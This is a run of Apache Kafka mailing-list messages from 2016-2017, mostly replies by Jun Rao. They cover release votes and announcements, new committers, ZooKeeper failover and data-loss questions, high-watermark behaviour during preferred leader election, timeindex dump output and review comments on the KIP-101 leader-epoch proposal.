> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Wednesday, April 26, 2017 ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~gwenshap/kafka-0.10.2.1-rc3/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.1 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 8e4f09caeaa877f06dc75c7da1af7a727e5e599f
>
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> /**
>
> Your help in validating this bugfix release is super valuable, so
> please take the time to test and vote!
>
> Suggested tests:
>  * Grab the source archive and make sure it compiles
>  * Grab one of the binary distros and run the quickstarts against them
>  * Extract and verify one of the site docs jars
>  * Build a sample against jars in the staging repo
>  * Validate GPG signatures on at least one file
>  * Validate the javadocs look ok
>  * The 0.10.2 documentation was updated for this bugfix release
> (especially upgrade, streams and connect portions) - please make sure
> it looks ok: http://kafka.apache.org/documentation.html
>
> But above all, try to avoid finding new bugs - we want to get this release
> out the door already :P
>
>
> Thanks,
> Gwen
>
>
>
> --
> *Gwen Shapira*
> Product Manager | Confluent
> 650.450.2760 | @gwenshap
> Follow us: Twitter  | blog
> 
>


Re: [ANNOUNCE] New committer: Rajini Sivaram

2017-04-24 Thread Jun Rao
Congratulations, Rajini ! Thanks for all your contributions.

Jun

On Mon, Apr 24, 2017 at 2:06 PM, Gwen Shapira  wrote:

> The PMC for Apache Kafka has invited Rajini Sivaram as a committer and we
> are pleased to announce that she has accepted!
>
> Rajini contributed 83 patches, 8 KIPs (all security and quota
> improvements) and a significant number of reviews. She is also on the
> conference committee for Kafka Summit, where she helped select content
> for our community event. Through her contributions she's shown good
> judgement, good coding skills, willingness to work with the community on
> finding the best
> solutions and very consistent follow through on her work.
>
> Thank you for your contributions, Rajini! Looking forward to many more :)
>
> Gwen, for the Apache Kafka PMC
>


Re: Re: ZK and Kafka failover testing

2017-04-19 Thread Jun Rao
Hi, Shri,

As Onur explained, if ZK is down, Kafka can still work, but won't be able
to react to actual broker failures until ZK is up again. So if a broker is
down in that window, some of the partitions may not be ready for read or
write.

As for the duplicates in the consumer, Hans had a good point. It would be
useful to see if the duplicates are introduced by the producer or the
consumer. Perhaps you can read the log again and see if duplicates are in
the log in the first place. Note that broker retries can introduce
duplicates.

Hi, Onur,

For the data loss issue that you mentioned, that should only happen with
acks=1. As we discussed offline, if acks=all is used and unclean leader
election is disabled, acked messages shouldn't be lost.
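
To make that last point concrete, here is a sketch of a producer configured
along those lines. The broker list and serializers are placeholders, and
unclean.leader.election.enable appears only as a comment because it is a
broker/topic setting, not a producer property:

    import java.util.Properties;
    import org.apache.kafka.clients.producer.KafkaProducer;
    import org.apache.kafka.clients.producer.ProducerConfig;

    public class DurableProducerConfig {
        public static KafkaProducer<String, String> create() {
            Properties props = new Properties();
            props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG,
                "broker1:9092,broker2:9092"); // placeholder broker list
            props.put(ProducerConfig.ACKS_CONFIG, "all"); // commit requires all in-sync replicas
            props.put(ProducerConfig.RETRIES_CONFIG, 3);  // note: retries can introduce duplicates
            props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG,
                "org.apache.kafka.common.serialization.StringSerializer");
            props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG,
                "org.apache.kafka.common.serialization.StringSerializer");
            // Broker/topic side (not a producer property):
            //   unclean.leader.election.enable=false
            return new KafkaProducer<>(props);
        }
    }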

Thanks,

Jun


On Wed, Apr 19, 2017 at 10:19 AM, Onur Karaman  wrote:

> If this is what I think it is, it has nothing to do with acks,
> max.in.flight.requests.per.connection, or anything client-side and is
> purely about the kafka cluster.
>
> Here's a simple example involving a single zookeeper instance, 3 brokers, a
> KafkaConsumer and KafkaProducer (neither of these clients interact with
> zookeeper).
> 1. start up zookeeper:
> > ./bin/zookeeper-server-start.sh config/zookeeper.properties
>
> 2. start up some brokers:
> > ./bin/kafka-server-start.sh config/server0.properties
> > ./bin/kafka-server-start.sh config/server1.properties
> > ./bin/kafka-server-start.sh config/server2.properties
>
> 3. create a topic:
> > ./bin/kafka-topics.sh --zookeeper localhost:2181 --create --topic t
> --partitions 1 --replication-factor 3
>
> 4. start a console consumer (this needs to happen before step 5 so we can
> write __consumer_offsets metadata to zookeeper):
> > ./bin/kafka-console-consumer.sh --broker-list
> localhost:9090,localhost:9091,localhost:9092 --topic t
>
> 5. kill zookeeper
>
> 6. start a console producer and produce some messages:
> > ./bin/kafka-console-producer.sh --broker-list
> localhost:9090,localhost:9091,localhost:9092 --topic t
>
> 7. notice the size of the broker logs grow with each message you send:
> > l /tmp/kafka-logs*/t-0
>
> 8. notice the consumer consuming the messages being produced
>
> Basically, zookeeper can be completely offline and your brokers will append
> to logs and process client requests just fine as long as it doesn't need to
> interact with zookeeper. Today, the only way a broker knows to stop
> accepting requests is when it receives instruction from the controller.
>
> I first realized this last July when debugging a small production data loss
> scenario that was a result of this[1]. Maybe this is an attempt at leaning
> towards availability over consistency. Personally I think that brokers
> should stop accepting requests when it disconnects from zookeeper.
>
> [1] The small production data loss scenario happens when accepting requests
> during the small window in between a broker's zookeeper session expiration
> and when the controller instructs the broker to stop accepting requests.
> During this time, the broker still thinks it leads partitions that are
> currently being led by another broker, effectively resulting in a window
> where the partition is led by two brokers. Clients can continue sending
> requests to the old leader, and for producers with low acknowledgement
> settings (like ack=1), their messages will be lost without the client
> knowing, as the messages are being appended to the phantom leader's logs
> instead of the true leader's logs.
>
> On Wed, Apr 19, 2017 at 7:56 AM, Shrikant Patel  wrote:
>
> > While we were testing, our producer had following configuration
> > max.in.flight.requests.per.connection=1, acks= all and retries=3.
> >
> > The entire producer side set is below. The consumer has manual offset
> > commit, it commit offset after it has successfully processed the message.
> >
> > Producer setting
> > bootstrap.servers= {point the F5 VS fronting Kafka cluster}
> > key.serializer= {appropriate value as per your cases}
> > value.serializer= {appropriate value as per your case}
> > acks= all
> > retries=3
> > ssl.key.password= {appropriate value as per your case}
> > ssl.keystore.location= {appropriate value as per your case}
> > ssl.keystore.password= {appropriate value as per your case}
> > ssl.truststore.location= {appropriate value as per your case}
> > ssl.truststore.password= {appropriate value as per your case}
> > batch.size=16384
> > client.id= {appropriate value as per your case, may help with debugging}
> > max.block.ms=65000
> > request.timeout.ms=3
> > security.protocol= SSL
> > ssl.enabled.protocols=TLSv1.2
> > ssl.keystore.type=JKS
> > ssl.protocol=TLSv1.2
> > ssl.truststore.type=JKS
> > max.in.flight.requests.per.connection=1
> > metadata.fetch.timeout.ms=6
> > reconnect.backoff.ms=1000
> > retry.backoff.ms=1000
> > max.request.size=1048576
> > linger.ms=0
> >
> > Consumer setting
> > bootstrap.servers= {point the F5 VS 

new mail archive service from Apache

2017-03-01 Thread Jun Rao
Hi,

Just want to pass along this to the community. There is a new mail archive
service https://lists.apache.org. It's beta, but is the long-term solution
for official ASF mail archives, and offers much better searching/threading
than mail-archives.a.o does.

Thanks,

Jun


Re: [ANNOUNCE] Apache Kafka 0.10.2.0 Released

2017-02-22 Thread Jun Rao
Thanks for driving the release, Ewen.

Jun

On Wed, Feb 22, 2017 at 12:33 AM, Ewen Cheslack-Postava <ewe...@apache.org>
wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.10.2.0. This is a feature release which includes the completion
> of 15 KIPs, over 200 bug fixes and improvements, and more than 500 pull
> requests merged.
>
> All of the changes in this release can be found in the release notes:
> https://archive.apache.org/dist/kafka/0.10.2.0/RELEASE_NOTES.html
>
> Apache Kafka is a distributed streaming platform with four core
> APIs:
>
> ** The Producer API allows an application to publish a stream of records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output
> stream to one or more output topics, effectively transforming the input
> streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might capture
> every change to a table.
>
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react to
> the
> streams of data.
>
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka-0.10.2.0-src.tgz
>
> and binary releases from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.11-0.10.2.0.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.10-0.10.2.0.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.12-0.10.2.0.tgz
> (experimental 2.12 artifact)
>
> Thanks to the 101 contributors on this release!
>
> Akash Sethi, Alex Loddengaard, Alexey Ozeritsky, amethystic, Andrea
> Cosentino, Andrew Olson, Andrew Stevenson, Anton Karamanov, Antony
> Stubbs, Apurva Mehta, Arun Mahadevan, Ashish Singh, Balint Molnar, Ben
> Stopford, Bernard Leach, Bill Bejeck, Colin P. Mccabe, Damian Guy, Dan
> Norwood, Dana Powers, dasl, Derrick Or, Dong Lin, Dustin Cote, Edoardo
> Comar, Edward Ribeiro, Elias Levy, Emanuele Cesena, Eno Thereska, Ewen
> Cheslack-Postava, Flavio Junqueira, fpj, Geoff Anderson, Guozhang Wang,
> Gwen Shapira, Hikiko Murakami, Himani Arora, himani1, Hojjat Jafarpour,
> huxi, Ishita Mandhan, Ismael Juma, Jakub Dziworski, Jan Lukavsky, Jason
> Gustafson, Jay Kreps, Jeff Widman, Jeyhun Karimov, Jiangjie Qin, Joel
> Koshy, Jon Freedman, Joshi, Jozef Koval, Json Tu, Jun He, Jun Rao,
> Kamal, Kamal C, Kamil Szymanski, Kim Christensen, Kiran Pillarisetty,
> Konstantine Karantasis, Lihua Xin, LoneRifle, Magnus Edenhill, Magnus
> Reftel, Manikumar Reddy O, Mark Rose, Mathieu Fenniak, Matthias J. Sax,
> Mayuresh Gharat, MayureshGharat, Michael Schiff, Mickael Maison,
> MURAKAMI Masahiko, Nikki Thean, Olivier Girardot, pengwei-li, pilo,
> Prabhat Kashyap, Qian Zheng, Radai Rosenblatt, radai-rosenblatt, Raghav
> Kumar Gautam, Rajini Sivaram, Rekha Joshi, rnpridgeon, Ryan Pridgeon,
> Sandesh K, Scott Ferguson, Shikhar Bhushan, steve, Stig Rohde Døssing,
> Sumant Tambe, Sumit Arrawatia, Theo, Tim Carey-Smith, Tu Yang, Vahid
> Hashemian, wangzzu, Will Marshall, Xavier Léauté, Xavier Léauté, Xi Hu,
> Yang Wei, yaojuncn, Yuto Kawamura
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ewen
>


Re: [kafka-clients] [VOTE] 0.10.2.0 RC2

2017-02-15 Thread Jun Rao
Hi, Ewen,

Thanks for running the release. +1. Verified quickstart on 2.10 binary.

Jun

On Tue, Feb 14, 2017 at 10:39 AM, Ewen Cheslack-Postava 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the third candidate for release of Apache Kafka 0.10.2.0.
>
> This is a minor version release of Apache Kafka. It includes 19 new KIPs.
> See the release notes and release plan (https://cwiki.apache.org/conf
> luence/display/KAFKA/Release+Plan+0.10.2.0) for more details. A few
> feature highlights: SASL-SCRAM support, improved client compatibility to
> allow use of clients newer than the broker, session windows and global
> tables in the Kafka Streams API, single message transforms in the Kafka
> Connect framework.
>
> Important note: in addition to the artifacts generated using JDK7 for
> Scala 2.10 and 2.11, this release also includes experimental artifacts
> built using JDK8 for Scala 2.12.
>
> Important code changes since RC1 (non-docs, non system tests):
>
> KAFKA-4756; The auto-generated broker id should be passed to
> MetricReporter.configure
> KAFKA-4761; Fix producer regression handling small or zero batch size
>
> Release notes for the 0.10.2.0 release:
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/RELEASE_NOTES.html
>
> *** Please download, test and vote by February 17th 5pm ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.0 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 5712b489038b71ed8d5a679856d1dfaa925eadc1
>
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> * Successful Jenkins builds for the 0.10.2 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.10.2-jdk7/77/
> System tests: https://jenkins.confluent.io/job/system-test-kafka-0.10.2/
> 29/
>
> /**
>
> Thanks,
> Ewen
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAE1jLMORScgr1RekNgY0fLykSPh_%
> 2BgkRYN7vok3fz1ou%3DuW3kw%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>


Re: Quick replication question - loss of committed messages during preferred replica election

2017-01-24 Thread Jun Rao
Hi, Mark,

Thanks for pointing this out. This issue is fixed in 0.10.0.0 in
https://issues.apache.org/jira/browse/KAFKA-725.

In 0.9.0, what's going to happen is the consumer will get an unknown error.
Normally, the consumer will only reset the offset if it gets an
OffsetOutOfRangeException. If it gets an unknown error, it's supposed to
just retry the same fetch request without resetting the offset. Since
Connect uses the java consumer, I'd expect it to behave in the same way.
Were you able to verify that it behaves differently? In any case, do you
think you can try the latest stable release?
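
Whether it would have changed the Connect behavior described above is
uncertain (Connect configures its own consumers), but for plain consumer
applications, setting auto.offset.reset=none turns a silent reset into an
explicit error. A minimal sketch; the broker address, group id, and topic
are placeholders:

    import java.util.Collections;
    import java.util.Properties;
    import org.apache.kafka.clients.consumer.InvalidOffsetException;
    import org.apache.kafka.clients.consumer.KafkaConsumer;

    public class NoResetConsumer {
        public static void main(String[] args) {
            Properties props = new Properties();
            props.put("bootstrap.servers", "localhost:9092"); // placeholder
            props.put("group.id", "my-group");                // placeholder
            props.put("auto.offset.reset", "none"); // throw instead of silently resetting
            props.put("key.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
            props.put("value.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");

            try (KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props)) {
                consumer.subscribe(Collections.singletonList("t")); // placeholder topic
                consumer.poll(1000); // 0.9/0.10-era signature: poll(long timeoutMs)
            } catch (InvalidOffsetException e) {
                // covers NoOffsetForPartitionException and OffsetOutOfRangeException:
                // no valid position and no reset policy, so the application decides
                System.err.println("offset unavailable: " + e);
            }
        }
    }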

Jun

On Mon, Jan 23, 2017 at 11:53 AM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Thanks for the reply. This makes sense, I think. One followup question:
>
> During the failover when the new-leader has a stale HWM, is it possible
> for this broker to return an error to consumers who are consuming
> between HWM and LEO?
>
> I saw a comment on a document that says the leader could, legally,
> return an empty response temporarily until the HWM has caught up -- but
> I've examined the code (0.9) and this does not seem to be implemented.
> Instead, it looks like we get IllegalArgumentException.
>
> 1) Consumer fetches from original leader, sees latest HWM
> 2) Failover happens
> 3) New leader has stale HWM
> 4) Consumer sends next fetch to new leader, with start offset = latest
> HWM (from step 1)
> 5) New leader returns IllegalArgumentException because start offset >
> stale HWM (from step 3)
>
> It looks like what then happened is that the client, Kafka Connect in
> our case, reset its offset to 0 and started reconsuming from the head of
> the log. This causes significant message churn and is unnecessary,
> although I'm not entirely sure of the correct fix.
>
> I'm basing this on the code I'm looking at from 0.9:
>
> * fetchMessages is called, and fetchOnlyCommitted is true (request is
> from a consumer, not a replica)
>
> * readFromLocalLog is called, sets maxOffsetOpt:
>
>   val maxOffsetOpt = if (readOnlyCommitted)
> Some(localReplica.highWatermark.messageOffset)
>   else
> None
>
> * read is later called:
>
>   log.read(offset, fetchSize, maxOffsetOpt)
>
> * read then throws the exception:
>
> // calculate the length of the message set to read based on whether
> or not they gave us a maxOffset
> val length =
>   maxOffset match {
> case Some(offset) => {
>   // there is a max offset, translate it to a file position and
>   // use that to calculate the max read size
>   if (offset < startOffset)
>     throw new IllegalArgumentException("Attempt to read with a
>       maximum offset (%d) less than the start offset (%d)."
>       .format(offset, startOffset))
>
> * readFromLocalLog catches and returns:
>
>   case e: Throwable =>
>     BrokerTopicStats.getBrokerTopicStats(topic).failedFetchRequestRate.mark()
>     BrokerTopicStats.getBrokerAllTopicsStats().failedFetchRequestRate.mark()
>     error("Error processing fetch operation on partition [%s,%d]
>       offset %d".format(topic, partition, offset), e)
>     LogReadResult(FetchDataInfo(LogOffsetMetadata.UnknownOffsetMetadata,
>       MessageSet.Empty), -1L, fetchSize, false, Some(e))
>
> The consumer then restarts back to the beginning. This looks to be the
> source of our 'data loss', which isn't actually loss but a bad
> interaction of failover and catching a stale HWM leading to errors being
> thrown by the broker when it maybe doesn't need to.
>
> Thoughts?
>
> --
> Mark Smith
> m...@qq.is
>
>
> On Wed, Jan 18, 2017, at 02:11 PM, Jun Rao wrote:
> > Hi, Mark,
> >
> > Your understanding about HWM transition is correct. When the leader
> > changes
> > due to preferred leader election, the new leader will have all the
> > committed messages, but a potentially stale HWM. The new leader won't do
> > any truncation to its local log though. Instead, it will try to commit
> > all
> > messages in its local log. It will advance HWM after all followers's LEO
> > have advanced.
> >
> > Thanks,
> >
> > Jun
> >
> > On Wed, Jan 18, 2017 at 12:13 AM, Mark Smith <m...@qq.is> wrote:
> >
> > > Hi all,
> > >
> > > Here at Dropbox we're still (off and on) trying to get to the bottom of
> > > the data loss that's been hitting our largest cluster during preferred
> > > replica elections. It unfortunately has repeated a few times, so now we
> > > have a question.
> >

Re: timeindex file timestamp mismatch (0.10.1.0)

2017-01-20 Thread Jun Rao
Meghana,

You are probably seeing this when running the DumpLogSegments tool on the
active (last) log segment. The DumpLogSegments tool is meant to be used only
on the indexes of immutable segments (i.e., segments that have rolled). We
preallocate the index on the active segment with 0 values, so
DumpLogSegments doesn't know the actual valid entries in the index and will
report those 0 values as errors. If you wait for the log segment to roll,
you should see the timeindex resized to 0 length.

Thanks,

Jun

On Fri, Jan 20, 2017 at 8:20 AM, Meghana Narasimhan <
mnarasim...@bandwidth.com> wrote:

> Hi,
> I'm testing upgrading our cluster from 0.9.0.1 to 0.10.1.0 on 2 clusters A
> and B. I have upgraded only the inter.broker.protocol.version to 0.10.1.0.
> The log.message.format.version is still 0.9.0.1.
>
> I'm writing test data from a java producer to the upgraded cluster A. As
> expected the .timeindex files get created. I understand that the timestamp
> will be appended to offsets only when I upgrade the
> log.message.format.version. But when I run the following command, I get the
> following.
>
> kafka-run-class kafka.tools.DumpLogSegments --files
> /mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
> Dumping /mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
> timestamp: 0 offset: 14500426
> Found timestamp mismatch in
> :/mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
>   Index timestamp: 0, log timestamp: -1
>   Index timestamp: 0, log timestamp: -1
> Found out of order timestamp in
> :/mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
>   Index timestamp: 0, Previously indexed timestamp: 0
>
> What does the timestamp mismatch indicate ? is it an error ?
>
> Also the other cluster, Cluster B is mirroring data from cluster A, and
> when the run the dumplogSegment command on that cluster I get something
> like this..
>
>
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
>
> Any inputs will be of great help.
> Thanks,
> Meghana
>


Re: Quick replication question - loss of committed messages during preferred replica election

2017-01-18 Thread Jun Rao
Hi, Mark,

Your understanding about HWM transition is correct. When the leader changes
due to preferred leader election, the new leader will have all the
committed messages, but a potentially stale HWM. The new leader won't do
any truncation to its local log though. Instead, it will try to commit all
messages in its local log. It will advance HWM after all followers' LEOs
have advanced.

Thanks,

Jun

On Wed, Jan 18, 2017 at 12:13 AM, Mark Smith  wrote:

> Hi all,
>
> Here at Dropbox we're still (off and on) trying to get to the bottom of
> the data loss that's been hitting our largest cluster during preferred
> replica elections. It unfortunately has repeated a few times, so now we
> have a question.
>
> To make sure we're understanding, message commit status (replication)
> basically goes through three phases:
>
> * Messages Uncommitted; the leader has received new production, and the
> followers receive the messages in a Fetch request. Everybody's LEO is
> incremented, but HWMs are unchanged. No messages are considered
> committed.
>
> * Leader Committed; in the subsequent Fetch, the follower says "my LEO
> is now X" and the leader records that and then updates its HWM to be the
> minimum of all followers' LEOs. After this stage, the messages are
> committed -- only on the leader. The follower's HWM is still in the
> past.
>
> * Leader+Follower Committed; or HWM Replication Fetch; in this final
> fetch, the follower is informed of the new HWM by the leader and
> increments its own HWM accordingly.
>
> These aren't actually distinct phases of course, they're just part of
> individual fetch requests, but I think logically the HWM transitions can
> be thought of in that way. I.e., "message uncommitted", "leader
> committed", "leader+follower committed".
>
> Is this understanding accurate?
>
> If so, is it just a fact that (right now) a preferred replica election
> has a small chance of electing a follower and causing message loss of
> any "leader committed" messages (i.e., messages that are not considered
> committed on the follower that is now getting promoted)?
>
> We can't find anything in the protocol that would guard against this.
> I've also been reading KIP-101 and it looks like this is being referred
> to sort-of in Scenario 1, however, that scenario is mentioning broker
> failure -- and my concern is that data loss is possible even in the
> normal scenario with no broker failures.
>
> Any thoughts?
>
> --
> Mark Smith
> m...@qq.is
>


Re: [ANNOUNCE] New committer: Grant Henke

2017-01-11 Thread Jun Rao
Grant,

Thanks for all your contribution! Congratulations!

Jun

On Wed, Jan 11, 2017 at 2:51 PM, Gwen Shapira  wrote:

> The PMC for Apache Kafka has invited Grant Henke to join as a
> committer and we are pleased to announce that he has accepted!
>
> Grant contributed 88 patches, 90 code reviews, countless great
> comments on discussions, a much-needed cleanup to our protocol and the
> on-going and critical work on the Admin protocol. Throughout this, he
> displayed great technical judgment, high-quality work and willingness
> to contribute where needed to make Apache Kafka awesome.
>
> Thank you for your contributions, Grant :)
>
> --
> Gwen Shapira
> Product Manager | Confluent
> 650.450.2760 | @gwenshap
> Follow us: Twitter | blog
>


Re: [VOTE] Vote for KIP-101 - Leader Epochs

2017-01-05 Thread Jun Rao
Hi, Ben,

Thanks for the updated KIP. +1

1) In OffsetForLeaderEpochResponse, start_offset probably should be
end_offset since it's the end offset of that epoch.
3) That's fine. We can fix KAFKA-1120 separately.

Jun


On Thu, Jan 5, 2017 at 11:11 AM, Ben Stopford <b...@confluent.io> wrote:

> Hi Jun
>
> Thanks for raising these points. Thorough as ever!
>
> 1) Changes made as requested.
> 2) Done.
> 3) My plan for handling returning leaders is simply to force the Leader
> Epoch to increment if a leader returns. I don't plan to fix KAFKA-1120 as
> part of this KIP. It is really a separate issue with wider implications.
> I'd be happy to add KAFKA-1120 into the release though if we have time.
> 4) Agreed. Not sure exactly how that's going to play out, but I think we're
> on the same page.
>
> Please could
>
> Cheers
> B
>
> On Thu, Jan 5, 2017 at 12:50 AM Jun Rao <j...@confluent.io> wrote:
>
> > Hi, Ben,
> >
> > Thanks for the proposal. Looks good overall. A few comments below.
> >
> > 1. For LeaderEpochRequest, we need to include topic right? We probably
> want
> > to follow other requests by nesting partition inside topic? For
> > LeaderEpochResponse,
> > do we need to return leader_epoch? I was thinking that we could just
> return
> > an end_offset, which is the next offset of the last message in the
> > requested leader generation. Finally, would OffsetForLeaderEpochRequest
> be
> > a better name?
> >
> > 2. We should bump up both the produce request and the fetch request
> > protocol version since both include the message set.
> >
> > 3. Extending LeaderEpoch to include Returning Leaders: To support this,
> do
> > you plan to use the approach that stores  CZXID in the broker
> registration
> > and including the CZXID of the leader in /brokers/topics/[topic]/
> > partitions/[partitionId]/state in ZK?
> >
> > 4. Since there are a few other KIPs involving message format too, it
> would
> > be useful to consider if we could combine the message format changes in
> the
> > same release.
> >
> > Thanks,
> >
> > Jun
> >
> >
> > On Wed, Jan 4, 2017 at 9:24 AM, Ben Stopford <b...@confluent.io> wrote:
> >
> > > Hi All
> > >
> > > We’re having some problems with this thread being subsumed by the
> > > [Discuss] thread. Hopefully this one will appear distinct. If you see
> > more
> > > than one, please use this one.
> > >
> > > KIP-101 should now be ready for a vote. As a reminder the KIP proposes
> a
> > > change to the replication protocol to remove the potential for replicas
> > to
> > > diverge.
> > >
> > > The KIP can be found here:  https://cwiki.apache.org/confl
> > > uence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+
> > > use+Leader+Epoch+rather+than+High+Watermark+for+Truncation <
> > > https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-
> > > +Alter+Replication+Protocol+to+use+Leader+Epoch+rather+
> > > than+High+Watermark+for+Truncation>
> > >
> > > Please let us know your vote.
> > >
> > > B
> > >
> > >
> > >
> > >
> > >
> >
>


Re: [VOTE] Vote for KIP-101 - Leader Epochs

2017-01-04 Thread Jun Rao
Hi, Ben,

Thanks for the proposal. Looks good overall. A few comments below.

1. For LeaderEpochRequest, we need to include the topic, right? We probably
want to follow other requests by nesting partition inside topic. For
LeaderEpochResponse, do we need to return leader_epoch? I was thinking that
we could just return an end_offset, which is the next offset after the last
message in the requested leader generation. Finally, would
OffsetForLeaderEpochRequest be a better name? (A rough sketch of the shape
under discussion follows after point 4.)

2. We should bump up both the produce request and the fetch request
protocol version since both include the message set.

3. Extending LeaderEpoch to include Returning Leaders: To support this, do
you plan to use the approach that stores  CZXID in the broker registration
and including the CZXID of the leader in /brokers/topics/[topic]/
partitions/[partitionId]/state in ZK?

4. Since there are a few other KIPs involving message format too, it would
be useful to consider if we could combine the message format changes in the
same release.
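
For concreteness, a rough sketch of the request/response shape raised in
point 1 (illustrative only, not a final wire format; all class and field
names here are placeholders), with partitions nested inside topics and
end_offset meaning the offset after the last message of the requested
epoch:

import java.util.List;

// Sketch only; names are illustrative, not the final protocol.
class OffsetForLeaderEpochRequest {
    static class PartitionData {
        final int partition;
        final int leaderEpoch; // the epoch whose end offset we want
        PartitionData(int partition, int leaderEpoch) {
            this.partition = partition;
            this.leaderEpoch = leaderEpoch;
        }
    }
    static class TopicData {
        final String topic;                   // partitions nested inside topic
        final List<PartitionData> partitions;
        TopicData(String topic, List<PartitionData> partitions) {
            this.topic = topic;
            this.partitions = partitions;
        }
    }
    final List<TopicData> topics;
    OffsetForLeaderEpochRequest(List<TopicData> topics) {
        this.topics = topics;
    }
}

class OffsetForLeaderEpochResponse {
    final String topic;
    final int partition;
    final long endOffset; // next offset after the last message of the epoch
    OffsetForLeaderEpochResponse(String topic, int partition, long endOffset) {
        this.topic = topic;
        this.partition = partition;
        this.endOffset = endOffset;
    }
}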

Thanks,

Jun


On Wed, Jan 4, 2017 at 9:24 AM, Ben Stopford  wrote:

> Hi All
>
> We’re having some problems with this thread being subsumed by the
> [Discuss] thread. Hopefully this one will appear distinct. If you see more
> than one, please use this one.
>
> KIP-101 should now be ready for a vote. As a reminder the KIP proposes a
> change to the replication protocol to remove the potential for replicas to
> diverge.
>
> The KIP can be found here:  https://cwiki.apache.org/confl
> uence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+
> use+Leader+Epoch+rather+than+High+Watermark+for+Truncation <
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-
> +Alter+Replication+Protocol+to+use+Leader+Epoch+rather+
> than+High+Watermark+for+Truncation>
>
> Please let us know your vote.
>
> B
>
>
>
>
>


Re: [VOTE] 0.10.1.1 RC1

2016-12-19 Thread Jun Rao
Hi, Guozhang,

Thanks for preparing the release. Verified quickstart. +1

Jun

On Thu, Dec 15, 2016 at 1:29 PM, Guozhang Wang  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second, and hopefully the last candidate for the release of
> Apache Kafka 0.10.1.1 before the break. This is a bug fix release and it
> includes fixes and improvements from 30 JIRAs. See the release notes for
> more details:
>
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 20 December, 8pm PT ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> NOTE the artifacts include the ones built from Scala 2.12.1 and Java 8,
> which are treated as pre-alpha artifacts for the Scala community to try
> and test out:
>
> https://repository.apache.org/content/groups/staging/org/
> apache/kafka/kafka_2.12/0.10.1.1/
>
> We will formally add Scala 2.12 support in future minor releases.
>
>
> * Javadoc:
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/javadoc/
>
